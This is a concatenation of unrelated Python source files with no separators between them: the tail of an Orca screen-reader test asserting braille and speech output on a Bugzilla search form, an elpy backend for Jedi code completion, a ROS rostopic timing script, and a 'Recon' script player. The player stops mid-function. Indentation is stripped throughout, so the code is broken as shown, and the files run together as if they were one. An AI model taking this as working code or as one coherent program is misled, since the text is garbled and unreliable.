sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"2. Tab",
["BRAILLE LINE: ' $l'",
" VISIBLE: ' $l', cursor=1",
"SPEECH OUTPUT: 'entry'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"3. Tab",
["BRAILLE LINE: 'Search push button'",
" VISIBLE: 'Search push button', cursor=1",
"BRAILLE LINE: 'Browse mode'",
" VISIBLE: 'Browse mode', cursor=0",
"SPEECH OUTPUT: 'Search push button'",
"SPEECH OUTPUT: 'Browse mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"4. Tab",
["BRAILLE LINE: 'Search push button'",
" VISIBLE: 'Search push button', cursor=1",
"BRAILLE LINE: 'Admin'",
" VISIBLE: 'Admin', cursor=1",
"BRAILLE LINE: 'Focus mode'",
" VISIBLE: 'Focus mode', cursor=0",
"SPEECH OUTPUT: 'table with 2 rows 1 column'",
"SPEECH OUTPUT: 'Classification: multi-select List with 8 items'",
"SPEECH OUTPUT: 'Admin.'",
"SPEECH OUTPUT: 'Focus mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"5. Tab",
["BRAILLE LINE: 'Admin'",
" VISIBLE: 'Admin', cursor=1",
"BRAILLE LINE: 'accerciser'",
" VISIBLE: 'accerciser', cursor=1",
"SPEECH OUTPUT: 'table with 2 rows 1 column'",
"SPEECH OUTPUT: 'Product: multi-select List with 379 items'",
"SPEECH OUTPUT: 'accerciser.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"6. Tab",
["BRAILLE LINE: 'Component'",
" VISIBLE: 'Component', cursor=1",
"BRAILLE LINE: 'Browse mode'",
" VISIBLE: 'Browse mode', cursor=0",
"BRAILLE LINE: 'Component'",
" VISIBLE: 'Component', cursor=1",
"SPEECH OUTPUT: 'Component link.'",
"SPEECH OUTPUT: 'Browse mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"7. Tab",
["BRAILLE LINE: 'abiscan'",
" VISIBLE: 'abiscan', cursor=1",
"BRAILLE LINE: 'Focus mode'",
" VISIBLE: 'Focus mode', cursor=0",
"SPEECH OUTPUT: 'Component: multi-select List with 1248 items'",
"SPEECH OUTPUT: 'abiscan.'",
"SPEECH OUTPUT: 'Focus mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"8. Tab",
["BRAILLE LINE: 'abiscan'",
" VISIBLE: 'abiscan', cursor=1",
"BRAILLE LINE: '0.0.1'",
" VISIBLE: '0.0.1', cursor=1",
"SPEECH OUTPUT: 'table with 2 rows 1 column'",
"SPEECH OUTPUT: 'Version: multi-select List with 857 items'",
"SPEECH OUTPUT: '0.0.1.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"9. Tab",
["BRAILLE LINE: '---'",
" VISIBLE: '---', cursor=1",
"SPEECH OUTPUT: 'table with 2 rows 1 column'",
"SPEECH OUTPUT: 'Target Milestone: multi-select List with 555 items'",
"SPEECH OUTPUT: '---.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"10. Tab",
["BRAILLE LINE: 'A Comment: contains the string combo box'",
" VISIBLE: 'A Comment: contains the string c', cursor=12",
"SPEECH OUTPUT: 'A Comment: contains the string combo box.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"11. Tab",
["BRAILLE LINE: ' $l'",
" VISIBLE: ' $l', cursor=1",
"SPEECH OUTPUT: 'entry'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"12. Tab",
["BRAILLE LINE: 'Whiteboard: contains all of the words/strings combo box'",
" VISIBLE: 'Whiteboard: contains all of the ', cursor=13",
"SPEECH OUTPUT: 'Whiteboard: contains all of the words/strings combo box.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"13. Tab",
["BRAILLE LINE: ' $l'",
" VISIBLE: ' $l', cursor=1",
"SPEECH OUTPUT: 'entry'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"14. Tab",
["BRAILLE LINE: 'Keywords'",
" VISIBLE: 'Keywords', cursor=1",
"BRAILLE LINE: 'Browse mode'",
" VISIBLE: 'Browse mode', cursor=0",
"BRAILLE LINE: 'Keywords'",
" VISIBLE: 'Keywords', cursor=1",
"SPEECH OUTPUT: 'Keywords link.'",
"SPEECH OUTPUT: 'Browse mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"15. Tab",
["BRAILLE LINE: 'Keywords: contains all of the keywords combo box'",
" VISIBLE: 'Keywords: contains all of the ke', cursor=11",
"BRAILLE LINE: 'Focus mode'",
" VISIBLE: 'Focus mode', cursor=0",
"SPEECH OUTPUT: 'Keywords: contains all of the keywords combo box.'",
"SPEECH OUTPUT: 'Focus mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"16. Tab",
["BRAILLE LINE: 'Keywords: contains all of the keywords combo box'",
" VISIBLE: 'Keywords: contains all of the ke', cursor=11",
"BRAILLE LINE: ' $l'",
" VISIBLE: ' $l', cursor=1",
"SPEECH OUTPUT: 'entry'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"17. Tab",
["BRAILLE LINE: 'UNCONFIRMED'",
" VISIBLE: 'UNCONFIRMED', cursor=1",
"SPEECH OUTPUT: 'table with 2 rows 1 column'",
"SPEECH OUTPUT: 'Status: multi-select List with 8 items'",
"SPEECH OUTPUT: 'UNCONFIRMED.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"18. Tab",
["BRAILLE LINE: 'FIXED'",
" VISIBLE: 'FIXED', cursor=1",
"SPEECH OUTPUT: 'table with 2 rows 1 column'",
"SPEECH OUTPUT: 'Resolution: multi-select List with 12 items'",
"SPEECH OUTPUT: 'FIXED.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"19. Tab",
["BRAILLE LINE: 'blocker'",
" VISIBLE: 'blocker', cursor=1",
"SPEECH OUTPUT: 'table with 2 rows 1 column'",
"SPEECH OUTPUT: 'Severity: multi-select List with 7 items'",
"SPEECH OUTPUT: 'blocker.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"20. Tab",
["BRAILLE LINE: 'Immediate'",
" VISIBLE: 'Immediate', cursor=1",
"SPEECH OUTPUT: 'table with 2 rows 1 column'",
"SPEECH OUTPUT: 'Priority: multi-select List with 5 items'",
"SPEECH OUTPUT: 'Immediate.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"21. Tab",
["BRAILLE LINE: 'All'",
" VISIBLE: 'All', cursor=1",
"SPEECH OUTPUT: 'table with 2 rows 1 column'",
"SPEECH OUTPUT: 'OS: multi-select List with 21 items'",
"SPEECH OUTPUT: 'All.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"22. Tab",
["BRAILLE LINE: '<x> the bug assignee check box'",
" VISIBLE: '<x> the bug assignee check box', cursor=1",
"BRAILLE LINE: 'Browse mode'",
" VISIBLE: 'Browse mode', cursor=0",
"SPEECH OUTPUT: 'Email and Numbering panel'",
"SPEECH OUTPUT: 'the bug assignee check box checked'",
"SPEECH OUTPUT: 'Browse mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"23. Tab",
["BRAILLE LINE: '<x> the bug assignee check box'",
" VISIBLE: '<x> the bug assignee check box', cursor=1",
"BRAILLE LINE: '< > the reporter check box'",
" VISIBLE: '< > the reporter check box', cursor=1",
"SPEECH OUTPUT: 'the reporter check box not checked'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"24. Tab",
["BRAILLE LINE: '< > the QA contact check box'",
" VISIBLE: '< > the QA contact check box', cursor=1",
"SPEECH OUTPUT: 'the QA contact check box not checked'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"25. Tab",
["BRAILLE LINE: '< > a CC list member check box'",
" VISIBLE: '< > a CC list member check box', cursor=1",
"SPEECH OUTPUT: 'a CC list member check box not checked'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"26. Tab",
["BRAILLE LINE: '< > a commenter check box'",
" VISIBLE: '< > a commenter check box', cursor=1",
"SPEECH OUTPUT: 'a commenter check box not checked'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"27. Tab",
["BRAILLE LINE: 'contains combo box'",
" VISIBLE: 'contains combo box', cursor=1",
"BRAILLE LINE: 'Focus mode'",
" VISIBLE: 'Focus mode', cursor=0",
"SPEECH OUTPUT: 'contains combo box.'",
"SPEECH OUTPUT: 'Focus mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"28. Tab",
["BRAILLE LINE: 'contains combo box'",
" VISIBLE: 'contains combo box', cursor=1",
"BRAILLE LINE: ' $l'",
" VISIBLE: ' $l', cursor=1",
"SPEECH OUTPUT: 'entry'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"29. Tab",
["BRAILLE LINE: '<x> the bug assignee check box'",
" VISIBLE: '<x> the bug assignee check box', cursor=1",
"BRAILLE LINE: 'Browse mode'",
" VISIBLE: 'Browse mode', cursor=0",
"SPEECH OUTPUT: 'the bug assignee check box checked'",
"SPEECH OUTPUT: 'Browse mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"30. Tab",
["BRAILLE LINE: '<x> the bug assignee check box'",
" VISIBLE: '<x> the bug assignee check box', cursor=1",
"BRAILLE LINE: '<x> the reporter check box'",
" VISIBLE: '<x> the reporter check box', cursor=1",
"SPEECH OUTPUT: 'the reporter check box checked'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"31. Tab",
["BRAILLE LINE: '<x> the QA contact check box'",
" VISIBLE: '<x> the QA contact check box', cursor=1",
"SPEECH OUTPUT: 'the QA contact check box checked'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"32. Tab",
["BRAILLE LINE: '<x> a CC list member check box'",
" VISIBLE: '<x> a CC list member check box', cursor=1",
"SPEECH OUTPUT: 'a CC list member check box checked'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"33. Tab",
["BRAILLE LINE: '< > a commenter check box'",
" VISIBLE: '< > a commenter check box', cursor=1",
"SPEECH OUTPUT: 'a commenter check box not checked'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"34. Tab",
["BRAILLE LINE: 'contains combo box'",
" VISIBLE: 'contains combo box', cursor=1",
"BRAILLE LINE: 'Focus mode'",
" VISIBLE: 'Focus mode', cursor=0",
"SPEECH OUTPUT: 'contains combo box.'",
"SPEECH OUTPUT: 'Focus mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"35. Tab",
["BRAILLE LINE: 'contains combo box'",
" VISIBLE: 'contains combo box', cursor=1",
"BRAILLE LINE: ' $l'",
" VISIBLE: ' $l', cursor=1",
"SPEECH OUTPUT: 'entry'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"36. Tab",
["BRAILLE LINE: 'Only include combo box'",
" VISIBLE: 'Only include combo box', cursor=1",
"SPEECH OUTPUT: 'Only include combo box.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"37. Tab",
["BRAILLE LINE: 'bugs numbered: $l'",
" VISIBLE: 'bugs numbered: $l', cursor=16",
"SPEECH OUTPUT: 'bugs numbered: entry'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"38. Tab",
["BRAILLE LINE: 'Only bugs changed between: $l'",
" VISIBLE: 'Only bugs changed between: $l', cursor=28",
"SPEECH OUTPUT: 'Bug Changes panel'",
"SPEECH OUTPUT: 'List with 3 items'",
"SPEECH OUTPUT: 'Only bugs changed between: entry'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"39. Tab",
["BRAILLE LINE: 'and Now $l'",
" VISIBLE: 'and Now $l', cursor=8",
"BRAILLE LINE: 'and Now $l'",
" VISIBLE: 'and Now $l', cursor=8",
"SPEECH OUTPUT: 'and entry Now selected'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"40. Tab",
["BRAILLE LINE: '[Bug creation]'",
" VISIBLE: '[Bug creation]', cursor=1",
"SPEECH OUTPUT: 'where one or more of the following changed: multi-select List with 26 items'",
"SPEECH OUTPUT: '[Bug creation].'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"41. Tab",
["BRAILLE LINE: 'and the new value was: $l'",
" VISIBLE: 'and the new value was: $l', cursor=24",
"SPEECH OUTPUT: 'and the new value was: entry'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"42. Tab",
["BRAILLE LINE: 'Unspecified'",
" VISIBLE: 'Unspecified', cursor=1",
"SPEECH OUTPUT: 'table with 2 rows 1 column'",
"SPEECH OUTPUT: 'GNOME version: multi-select List with 14 items'",
"SPEECH OUTPUT: 'Unspecified.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"43. Tab",
["BRAILLE LINE: 'Unspecified'",
" VISIBLE: 'Unspecified', cursor=1",
"SPEECH OUTPUT: 'table with 2 rows 1 column'",
"SPEECH OUTPUT: 'GNOME target: multi-select List with 12 items'",
"SPEECH OUTPUT: 'Unspecified.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"44. Tab",
["BRAILLE LINE: 'Sort results by: Reuse same sort as last time combo box'",
" VISIBLE: 'Sort results by: Reuse same sort', cursor=18",
"SPEECH OUTPUT: 'Sort results by: Reuse same sort as last time combo box.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"45. Tab",
["BRAILLE LINE: 'Search push button'",
" VISIBLE: 'Search push button', cursor=1",
"BRAILLE LINE: 'Browse mode'",
" VISIBLE: 'Browse mode', cursor=0",
"SPEECH OUTPUT: 'Search push button'",
"SPEECH OUTPUT: 'Browse mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"46. Tab",
["BRAILLE LINE: 'Search push button'",
" VISIBLE: 'Search push button', cursor=1",
"BRAILLE LINE: '< > and remember these as my default search options check box'",
" VISIBLE: '< > and remember these as my def', cursor=1",
"SPEECH OUTPUT: 'and remember these as my default search options check box not checked'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"47. Tab",
["BRAILLE LINE: '< > Not (negate this whole chart) check box'",
" VISIBLE: '< > Not \(negate this whole chart', cursor=1",
"SPEECH OUTPUT: 'Not (negate this whole chart) check box not checked'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"48. Tab",
["BRAILLE LINE: '--- combo box'",
" VISIBLE: '--- combo box', cursor=1",
"BRAILLE LINE: 'Focus mode'",
" VISIBLE: 'Focus mode', cursor=0",
"SPEECH OUTPUT: '--- combo box.'",
"SPEECH OUTPUT: 'Focus mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"49. Tab",
["BRAILLE LINE: '--- combo box'",
" VISIBLE: '--- combo box', cursor=1",
"BRAILLE LINE: '--- combo box'",
" VISIBLE: '--- combo box', cursor=1",
"SPEECH OUTPUT: '--- combo box.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"50. Tab",
["BRAILLE LINE: ' $l'",
" VISIBLE: ' $l', cursor=1",
"SPEECH OUTPUT: 'entry'"]))
sequence.append(utils.AssertionSummaryAction())
sequence.start()
"""Elpy backend using the Jedi library.
This backend uses the Jedi library:
https://github.com/davidhalter/jedi
"""
import sys
import traceback
import jedi
from elpy import rpc
class JediBackend(object):
"""The Jedi backend class.
Implements the RPC calls we can pass on to Jedi.
Documentation: http://jedi.jedidjah.ch/en/latest/docs/plugin-api.html
"""
name = "jedi"
def __init__(self, project_root):
self.project_root = project_root
self.completions = {}
sys.path.append(project_root)
def rpc_get_completions(self, filename, source, offset):
line, column = pos_to_linecol(source, offset)
proposals = run_with_debug(jedi, 'completions',
source=source, line=line, column=column,
path=filename, encoding='utf-8')
if proposals is None:
return []
self.completions = dict((proposal.name, proposal)
for proposal in proposals)
return [{'name': proposal.name,
'suffix': proposal.complete,
'annotation': proposal.type,
'meta': proposal.description}
for proposal in proposals]
def rpc_get_completion_docstring(self, completion):
proposal = self.completions.get(completion)
if proposal is None:
return None
else:
return proposal.docstring(fast=False)
def rpc_get_completion_location(self, completion):
proposal = self.completions.get(completion)
if proposal is None:
return None
else:
return (proposal.module_path, proposal.line)
def rpc_get_docstring(self, filename, source, offset):
line, column = pos_to_linecol(source, offset)
try:
locations = run_with_debug(jedi, 'goto_definitions',
source=source, line=line, column=column,
path=filename, encoding='utf-8',
re_raise=jedi.NotFoundError)
except jedi.NotFoundError:
return None
if locations:
return ('Documentation for {0}:\n\n'.format(
locations[-1].full_name) + locations[-1].docstring())
else:
return None
def rpc_get_definition(self, filename, source, offset):
line, column = pos_to_linecol(source, offset)
try:
locations = run_with_debug(jedi, 'goto_definitions',
source=source, line=line, column=column,
path=filename, encoding='utf-8',
re_raise=jedi.NotFoundError)
except jedi.NotFoundError:
return None
# goto_definitions() can return silly stuff like __builtin__
# for int variables, so we fall back on goto() in those
# cases. See issue #76.
if (
locations and
locations[0].module_path is None
):
locations = run_with_debug(jedi, 'goto_assignments',
source=source, line=line,
column=column,
path=filename, encoding='utf-8')
if not locations:
return None
else:
loc = locations[-1]
try:
if loc.module_path:
if loc.module_path == filename:
offset = linecol_to_pos(source,
loc.line,
loc.column)
else:
with open(loc.module_path) as f:
offset = linecol_to_pos(f.read(),
loc.line,
loc.column)
except IOError:
return None
return (loc.module_path, offset)
def rpc_get_calltip(self, filename, source, offset):
line, column = pos_to_linecol(source, offset)
calls = run_with_debug(jedi, 'call_signatures',
source=source, line=line, column=column,
path=filename, encoding='utf-8')
        if not calls:
            return None
        call = calls[0]
return {"name": call.name,
"index": call.index,
"params": [param.description for param in call.params]}
def rpc_get_usages(self, filename, source, offset):
"""Return the uses of the symbol at offset.
Returns a list of occurrences of the symbol, as dicts with the
fields name, filename, and offset.
"""
line, column = pos_to_linecol(source, offset)
try:
uses = run_with_debug(jedi, 'usages',
source=source, line=line, column=column,
path=filename, encoding='utf-8',
re_raise=(jedi.NotFoundError,))
except jedi.NotFoundError:
return []
if uses is None:
return None
result = []
for use in uses:
if use.module_path == filename:
offset = linecol_to_pos(source, use.line, use.column)
elif use.module_path is not None:
with open(use.module_path) as f:
text = f.read()
offset = linecol_to_pos(text, use.line, use.column)
result.append({"name": use.name,
"filename": use.module_path,
"offset": offset})
return result
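# A small driving sketch (hypothetical project path, file and source),
# showing how elpy's RPC layer would ask for completions at the end of a
# buffer:
#
#   backend = JediBackend('/tmp/project')
#   src = 'import json\njson.du'
#   backend.rpc_get_completions('/tmp/project/x.py', src, len(src))
#   # -> e.g. [{'name': 'dump', ...}, {'name': 'dumps', ...}]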
# From the Jedi documentation:
#
# line is the current line you want to perform actions on (starting
# with line #1 as the first line). column represents the current
# column/indent of the cursor (starting with zero). source_path
# should be the path of your file in the file system.
def pos_to_linecol(text, pos):
"""Return a tuple of line and column for offset pos in text.
Lines are one-based, columns zero-based.
This is how Jedi wants it. Don't ask me why.
"""
line_start = text.rfind("\n", 0, pos) + 1
line = text.count("\n", 0, line_start) + 1
col = pos - line_start
return line, col
def linecol_to_pos(text, line, col):
"""Return the offset of this line and column in text.
Lines are one-based, columns zero-based.
This is how Jedi wants it. Don't ask me why.
"""
nth_newline_offset = 0
for i in range(line - 1):
new_offset = text.find("\n", nth_newline_offset)
if new_offset < 0:
raise ValueError("Text does not have {0} lines."
.format(line))
nth_newline_offset = new_offset + 1
offset = nth_newline_offset + col
if offset > len(text):
raise ValueError("Line {0} column {1} is not within the text"
.format(line, col))
return offset
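# Worked example: in the text "ab\ncd", offset 3 (the "c") maps to line 2,
# column 0 via pos_to_linecol, and linecol_to_pos("ab\ncd", 2, 0) == 3.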
def run_with_debug(jedi, name, *args, **kwargs):
re_raise = kwargs.pop('re_raise', ())
# Remove form feed characters, they confuse Jedi (jedi#424)
if 'source' in kwargs:
kwargs['source'] = kwargs['source'].replace("\f", " ")
try:
script = jedi.Script(*args, **kwargs)
return getattr(script, name)()
except Exception as e:
if isinstance(e, re_raise):
raise
# Bug jedi#417
if isinstance(e, TypeError) and str(e) == 'no dicts allowed':
return None
# Bug jedi#427
if isinstance(e, UnicodeDecodeError):
return None
# Bug jedi#429
if isinstance(e, IndexError):
return None
# Bug jedi#431
if isinstance(e, AttributeError) and str(e).endswith("'end_pos'"):
return None
# Bug in Python 2.6, see #275
if isinstance(e, OSError) and e.errno == 13:
return None
# Bug jedi#466
if (
isinstance(e, SyntaxError) and
"EOL while scanning string literal" in str(e)
):
return None
# Bug jedi#482
if isinstance(e, UnicodeEncodeError):
return None
# Bug jedi#485
if (
isinstance(e, ValueError) and
"invalid \\x escape" in str(e)
):
return None
# Bug jedi#485 in Python 3
if (
isinstance(e, SyntaxError) and
"truncated \\xXX escape" in str(e)
):
return None
# Bug jedi#465
if (
isinstance(e, SyntaxError) and
"encoding declaration in Unicode string" in str(e)
):
return None
# Bug #337 / jedi#471
if (
isinstance(e, ImportError) and
"No module named" in str(e)
):
return None
# Bug #365 / jedi#486 - fixed in Jedi 0.8.2
if (
isinstance(e, UnboundLocalError) and
"local variable 'path' referenced before assignment" in str(e)
):
return None
# Bug #366 / jedi#491
if (
isinstance(e, ValueError) and
"__loader__ is None" in str(e)
):
return None
# Bug #353
if (
isinstance(e, OSError) and
"No such file or directory" in str(e)
):
return None
from jedi import debug
debug_info = []
def _debug(level, str_out):
if level == debug.NOTICE:
prefix = "[N]"
elif level == debug.WARNING:
prefix = "[W]"
else:
prefix = "[?]"
debug_info.append(u"{0} {1}".format(prefix, str_out))
jedi.set_debug_function(_debug, speed=False)
try:
script = jedi.Script(*args, **kwargs)
return getattr(script, name)()
except Exception as e:
source = kwargs.get('source')
sc_args = []
sc_args.extend(repr(arg) for arg in args)
sc_args.extend("{0}={1}".format(k, "source" if k == "source"
else repr(v))
for (k, v) in kwargs.items())
data = {
"traceback": traceback.format_exc(),
"jedi_debug_info": {'script_args': ", ".join(sc_args),
'source': source,
'method': name,
'debug_info': debug_info}
}
raise rpc.Fault(message=str(e),
code=500,
data=data)
finally:
jedi.set_debug_function(None)
#!/usr/bin/env python
"""Rostopic time opening test module.
This is a standalone script.
In your ros_ws workspace, run:
rosrun cs473_baxter rostopic_test.py -f [FILE] -s [SECONDS]
The seconds that worked on our workstation was 0.3. We opened up the file
that contained the data from executing the command and we either got one
time interval of data or no data at all for n=10 trials.
"""
import time
import argparse
import subprocess
import rospy
def main():
arg_fmt = argparse.RawDescriptionHelpFormatter
parser = argparse.ArgumentParser(formatter_class=arg_fmt,
description=main.__doc__)
parser.add_argument(
'-f', '--file', dest='filename', required=True,
help="the file to save to and the path to that file"
)
parser.add_argument(
'-s', '--seconds', dest='seconds', required=True,
help="how long to sleep"
)
args = parser.parse_args(rospy.myargv()[1:])
rospy.init_node("rostopic_time_test")
    r_data = open(args.filename, 'a+')
    start = rospy.Time.now()
    # Zero-pad nanoseconds so e.g. 5 ns prints as ".000000005", not ".5".
    print 'start: %d.%09d' % (start.secs, start.nsecs)
r_proc = subprocess.Popen(['rostopic', 'echo',
'/robot/limb/right/endpoint_state'],
stdout=r_data)
time.sleep(float(args.seconds))
r_proc.terminate()
    end = rospy.Time.now()
    print 'end: %d.%09d' % (end.secs, end.nsecs)
r_data.close()
if __name__ == '__main__':
    main()
import re
import colorama
class Color(object):
@staticmethod
def green(txt):
return colorama.Fore.GREEN + txt + colorama.Fore.RESET
@staticmethod
def red(txt):
return colorama.Fore.RED + txt + colorama.Fore.RESET
@staticmethod
def blue(txt):
return colorama.Fore.BLUE + txt + colorama.Fore.RESET
@staticmethod
def dim(txt):
return colorama.Style.DIM + txt + colorama.Fore.RESET
def line_number_generator():
x = 1
while True:
yield x
x += 1
class ReconSyntaxError(Exception):
pass
class ReconReader(object):
@staticmethod
def get_lines(inp):
return ReconReader.concatenate_continuations(ReconReader.translate(inp))
@staticmethod
def translate(lines):
"""Returns an list of Line objects for every line
in the input list"""
g = line_number_generator()
return [Line(line, g.next()) for line in lines]
@staticmethod
def concatenate_continuations(lines):
"""Scans the input list for continuation lines,
and prepends their content to the OUT or IN line
that preceded them. Raises a ReconSyntaxError if the
preceding line is not an OUT or IN."""
outlines = []
lastline = None
for line in lines:
if line.type is LineType.CONTINUATION:
if lastline is None:
raise ReconSyntaxError("Line %d: The line is a CONTINUATION, but there's nothing to continue from." % line.number)
if lastline.type not in [LineType.IN, LineType.OUT]:
raise ReconSyntaxError("Line %d: Line is a CONTINUATION but the last non-continuation line is not OUT or IN." % line.number)
lastline.content += "\n" + line.content
else:
lastline = line
outlines.append(line)
return outlines
class LineType(object):
OUT = 1
IN = 2
BOOKMARK = 3
JUMP = 4
CONTINUATION = 5
QUIT = 6
@staticmethod
def to_string(linetype):
if linetype is LineType.OUT:
return "OUT"
if linetype is LineType.IN:
return " IN"
if linetype is LineType.BOOKMARK:
return "BMK"
if linetype is LineType.JUMP:
return "JMP"
if linetype is LineType.QUIT:
return "BYE"
if linetype is LineType.CONTINUATION:
return "..."
return "???"
class Line(object):
in_pattern = re.compile(r"^([0-9]+|\-+)\> ")
def __init__(self, line, number):
self.source = line
self.number = number
self.type = Line.detect_linetype(line)
self.indentation = 0
self.content = line.strip()
if self.type is not LineType.CONTINUATION:
self.indentation = Line.detect_indentation(line)
self.content = line.strip()[3:]
def __str__(self):
return "%3d %s %s %s" % (self.number, LineType.to_string(self.type), self.indentation, self.content.replace("\n", "\n "))
@staticmethod
def detect_indentation(line):
# Count the number of spaces at the start of the line.
spaces = 0
while spaces < len(line) and line[spaces] == " ":
spaces += 1
return spaces / 2
@staticmethod
def detect_linetype(line):
stripped_line = line.strip()
if stripped_line.startswith("<- "):
return LineType.OUT
if stripped_line.startswith("!B "):
return LineType.BOOKMARK
if stripped_line.startswith("!J "):
return LineType.JUMP
if stripped_line.startswith("!Q"):
return LineType.QUIT
if Line.in_pattern.match(stripped_line):
return LineType.IN
# If we couldn't detect a line type the line must
# be a paragraph continuation.
return LineType.CONTINUATION
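
    # Examples of the recognised prefixes (after stripping whitespace):
    #   "<- Hello."   -> OUT
    #   "1> Hi!"      -> IN (a run of dashes also works: "--> Hi!")
    #   "!B start"    -> BOOKMARK
    #   "!J start"    -> JUMP
    #   "!Q"          -> QUIT
    #   anything else -> CONTINUATION of the previous OUT/IN line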
class ReconPlayer(object):
def __init__(self, lines):
self.lines = lines
self.cursor = 0
def log(self, msg):
print Color.red("# " + msg)
def play(self, continuous=True, cursor=0, choice=None):
self.cursor = cursor
response = {
"action": "input",
"out": "",
"in": [],
"cursor": 0
}
while True:
if self.cursor >= len(self.lines):
self.log("Reached end of script - exiting.")
break
line = self.current_line()
if line.type is LineType.JUMP:
self.log("Jumping to " + line.content)
self.move_cursor_to_bookmark(line.content)
if line.type is LineType.OUT:
self.log("Speech")
print line.content, "\n"
